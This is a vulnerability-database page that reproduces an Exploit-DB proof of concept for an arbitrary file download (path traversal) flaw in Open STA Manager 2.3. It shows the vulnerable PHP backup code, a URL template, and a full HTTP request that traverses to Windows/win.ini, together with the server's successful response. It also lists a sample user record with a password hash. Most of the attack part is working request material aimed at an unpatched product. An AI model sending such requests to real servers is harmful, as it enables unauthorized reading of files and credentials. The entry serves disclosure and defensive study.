Open STA Manager 2.3 - Arbitrary File Download

vendor:

Open STA Manager

by:

Ihsan Sencan

7.5

CVSS

HIGH

Arbitrary File Download

CWE

Product Name: Open STA Manager

Affected Version From: 2.3

Affected Version To: 2.3

Patch Exists: NO

Related CWE: N/A

CPE: a:openstamanager:open_sta_manager:2.3

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Open STA Manager 2.3 – Arbitrary File Download

Open STA Manager 2.3 is vulnerable to arbitrary file download. Technicians, Agents, Customers users group can run sql codes. The vulnerable code is located in /[PATH]/modules/backup/actions.php, where the 'op' parameter is not properly sanitized before being used to read a file. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to download any file from the server.

Mitigation:

The vendor should properly sanitize the 'op' parameter before using it to read a file.

Source

Exploit-DB raw data:

# Exploit Title: Open STA Manager 2.3 - Arbitrary File Download
# Dork: N/A
# Date: 2018-10-25
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.openstamanager.com/
# Software Link: https://sourceforge.net/projects/openstamanager/files/latest/download
# Version: 2.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/modules/backup/actions.php?op=getfile&file=[FILE]
# 
# Technicians, Agents, Customers users group can run sql codes.
# 
# /* `exploitdb`.`zz_users` */
$zz_users = array(
  array('idutente' => '2','username' => 'efeefeefe','password' => '$2y$10$pesWR2SHoxriSupiXsBwX.tTFdsjk9XuJoZAS/L5thFUt97LMLiyu','email' => 'efe@omerefe.com','idanagrafica' => '0','idtipoanagrafica' => '0','idgruppo' => '4','enabled' => '1','created_at' => '2018-10-25 09:30:33','updated_at' => '2018-10-25 09:32:09')
);
# 
# /[PATH]/modules/backup/actions.php
# ....
# 05 switch (filter('op')) {
# 06 case 'getfile':
# 07 	$file = filter('file');
# 08 
# 09 	force_download($file, file_get_contents($backup_dir.$file));
# 10 
# 11 	break;
# ....

GET /[PATH]/modules/backup/actions.php?op=getfile&file=../../../../../Windows/win.ini HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=lt998mh6qs6qq2d7daj9ogdoa0
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 25 Oct 2018 09:43:40 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0, private
Pragma: public
Content-Disposition: attachment; filename="win.ini";
Content-Transfer-Encoding: binary
Content-Length: 564
X-Robots-Tag: noindex
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8